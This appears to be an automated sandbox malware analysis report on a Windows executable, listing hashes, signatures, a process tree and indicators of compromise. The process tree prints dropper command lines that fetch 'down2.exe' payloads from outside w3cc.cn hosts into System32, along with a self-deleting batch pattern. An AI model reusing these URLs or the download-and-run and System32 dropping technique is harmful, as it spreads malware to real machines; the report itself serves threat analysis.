Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29/02/2024, 06:45
Static task
static1
Behavioral task
behavioral1
Sample
adf042c909d919ccca72d1bcf7338e71.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
adf042c909d919ccca72d1bcf7338e71.exe
Resource
win10v2004-20240226-en
General
-
Target
adf042c909d919ccca72d1bcf7338e71.exe
-
Size
175KB
-
MD5
adf042c909d919ccca72d1bcf7338e71
-
SHA1
bf9be4f139b3742d94593f3079f1f8836e5f5bb4
-
SHA256
71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
-
SHA512
d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173
-
SSDEEP
3072:C5YS+FskKww99rNeht/ry7LOp9NxTzW8U6Ao1Tcfk8BIo8/qDjrlXZ4EhNWwH:CSvVtw/Ijy7SpPn7LFSjrlXZ4E1
Malware Config
Signatures
-
resource yara_rule behavioral1/files/0x000d000000013413-12.dat aspack_v212_v242 -
Executes dropped EXE 5 IoCs
pid Process 2928 yXvPpK.exe 2552 CjQlMj.exe 2172 McooHs.exe 1592 DsaQDn.exe 888 gpVDWz.exe -
Loads dropped DLL 10 IoCs
pid Process 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe 2320 adf042c909d919ccca72d1bcf7338e71.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\SysWOW64\yXvPpK.exe adf042c909d919ccca72d1bcf7338e71.exe File opened for modification C:\Windows\SysWOW64\yXvPpK.exe adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\CjQlMj.exe.tmp adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\McooHs.exe.tmp adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\DsaQDn.exe.tmp adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\DelCAD.bat CjQlMj.exe File created C:\Windows\SysWOW64\gpVDWz.exe.tmp adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\DelCAD.bat McooHs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 4 IoCs
pid Process 2244 PING.EXE 588 PING.EXE 1268 PING.EXE 2852 PING.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 2320 wrote to memory of 2928 2320 adf042c909d919ccca72d1bcf7338e71.exe 28 PID 2320 wrote to memory of 2928 2320 adf042c909d919ccca72d1bcf7338e71.exe 28 PID 2320 wrote to memory of 2928 2320 adf042c909d919ccca72d1bcf7338e71.exe 28 PID 2320 wrote to memory of 2928 2320 adf042c909d919ccca72d1bcf7338e71.exe 28 PID 2320 wrote to memory of 2552 2320 adf042c909d919ccca72d1bcf7338e71.exe 29 PID 2320 wrote to memory of 2552 2320 adf042c909d919ccca72d1bcf7338e71.exe 29 PID 2320 wrote to memory of 2552 2320 adf042c909d919ccca72d1bcf7338e71.exe 29 PID 2320 wrote to memory of 2552 2320 adf042c909d919ccca72d1bcf7338e71.exe 29 PID 2320 wrote to memory of 2172 2320 adf042c909d919ccca72d1bcf7338e71.exe 31 PID 2320 wrote to memory of 2172 2320 adf042c909d919ccca72d1bcf7338e71.exe 31 PID 2320 wrote to memory of 2172 2320 adf042c909d919ccca72d1bcf7338e71.exe 31 PID 2320 wrote to memory of 2172 2320 adf042c909d919ccca72d1bcf7338e71.exe 31 PID 2320 wrote to memory of 1592 2320 adf042c909d919ccca72d1bcf7338e71.exe 35 PID 2320 wrote to memory of 1592 2320 adf042c909d919ccca72d1bcf7338e71.exe 35 PID 2320 wrote to memory of 1592 2320 adf042c909d919ccca72d1bcf7338e71.exe 35 PID 2320 wrote to memory of 1592 2320 adf042c909d919ccca72d1bcf7338e71.exe 35 PID 2552 wrote to memory of 1540 2552 CjQlMj.exe 36 PID 2552 wrote to memory of 1540 2552 CjQlMj.exe 36 PID 2552 wrote to memory of 1540 2552 CjQlMj.exe 36 PID 2552 wrote to memory of 1540 2552 CjQlMj.exe 36 PID 1540 wrote to memory of 2244 1540 cmd.exe 38 PID 1540 wrote to memory of 2244 1540 cmd.exe 38 PID 1540 wrote to memory of 2244 1540 cmd.exe 38 PID 1540 wrote to memory of 2244 1540 cmd.exe 38 PID 1540 wrote to memory of 588 1540 cmd.exe 40 PID 1540 wrote to memory of 588 1540 cmd.exe 40 PID 1540 wrote to memory of 588 1540 cmd.exe 40 PID 1540 wrote to memory of 588 1540 cmd.exe 40 PID 2320 wrote to memory of 888 2320 adf042c909d919ccca72d1bcf7338e71.exe 41 PID 2320 wrote to memory of 888 2320 adf042c909d919ccca72d1bcf7338e71.exe 41 PID 2320 wrote to memory of 888 2320 adf042c909d919ccca72d1bcf7338e71.exe 41 PID 2320 wrote to memory of 888 2320 adf042c909d919ccca72d1bcf7338e71.exe 41 PID 2172 wrote to memory of 848 2172 McooHs.exe 43 PID 2172 wrote to memory of 848 2172 McooHs.exe 43 PID 2172 wrote to memory of 848 2172 McooHs.exe 43 PID 2172 wrote to memory of 848 2172 McooHs.exe 43 PID 848 wrote to memory of 1268 848 cmd.exe 44 PID 848 wrote to memory of 1268 848 cmd.exe 44 PID 848 wrote to memory of 1268 848 cmd.exe 44 PID 848 wrote to memory of 1268 848 cmd.exe 44 PID 848 wrote to memory of 2852 848 cmd.exe 46 PID 848 wrote to memory of 2852 848 cmd.exe 46 PID 848 wrote to memory of 2852 848 cmd.exe 46 PID 848 wrote to memory of 2852 848 cmd.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\yXvPpK.exe"C:\Windows\system32\yXvPpK.exe" showautoC:\Windows\system32\eMEgKoPo.dll2⤵
- Executes dropped EXE
PID:2928
-
-
C:\Windows\SysWOW64\CjQlMj.exe"C:\Windows\system32\CjQlMj.exe" C:\Windows\system32\BygFkM2.exe http://x6.w3cc.cn/dw/down2.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\system32\DelCAD.bat3⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- Runs ping.exe
PID:2244
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- Runs ping.exe
PID:588
-
-
-
-
C:\Windows\SysWOW64\McooHs.exe"C:\Windows\system32\McooHs.exe" C:\Windows\system32\zcynDy2.exe http://x2.w3cc.cn/dw/down2.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\system32\DelCAD.bat3⤵
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- Runs ping.exe
PID:1268
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- Runs ping.exe
PID:2852
-
-
-
-
C:\Windows\SysWOW64\DsaQDn.exe"C:\Windows\system32\DsaQDn.exe" C:\Windows\system32\YwLroS2.exe http://x4.w3cc.cn/dw/down2.exe2⤵
- Executes dropped EXE
PID:1592
-
-
C:\Windows\SysWOW64\gpVDWz.exe"C:\Windows\system32\gpVDWz.exe" C:\Windows\system32\kPcInM2.exe http://x2.w3cc.cn/dw/down2.exe2⤵
- Executes dropped EXE
PID:888
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141B
MD555ddc7c397dac5382bffc27028613cf2
SHA1cd1ec3db09b2c87dbc12af0cee2e61c2811b7248
SHA2567af73cc02994867d8df3f7f35ba4b6533566fa66b0a332fcdd6154eaba8268f1
SHA512bd47ce4081fda66661ac783618e3caf38c86012b669e25e10c376f696c468ac867f955f3ae33e4d9633df7c2ac7e5b9606f17064589343ba562cb8fe954b6026
-
Filesize
141B
MD53b9f74672e6599f4d582d25049c67775
SHA1b07fea6b6986218b56665ff196295e53a1ab9028
SHA25660439805131c49c394e0a28e070e4a7ca6956eb3e0c3c7137d16993fa3217311
SHA5128791d98b7ab472d43595f1c85d4c21916eae04b294d8e1c1ed5685fb94d64b3e7236b1e917c784395f13c9ce9521df14978d3e6ecec21b1bb8ebf0f04569acfb
-
Filesize
35KB
MD578cd588e48bf05f83ac4d2e5bd3d32e2
SHA1c96060325a397b397a1d60076ce6e2c11f309a4f
SHA2565309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
SHA5128cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65
-
Filesize
175KB
MD5adf042c909d919ccca72d1bcf7338e71
SHA1bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA25671580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173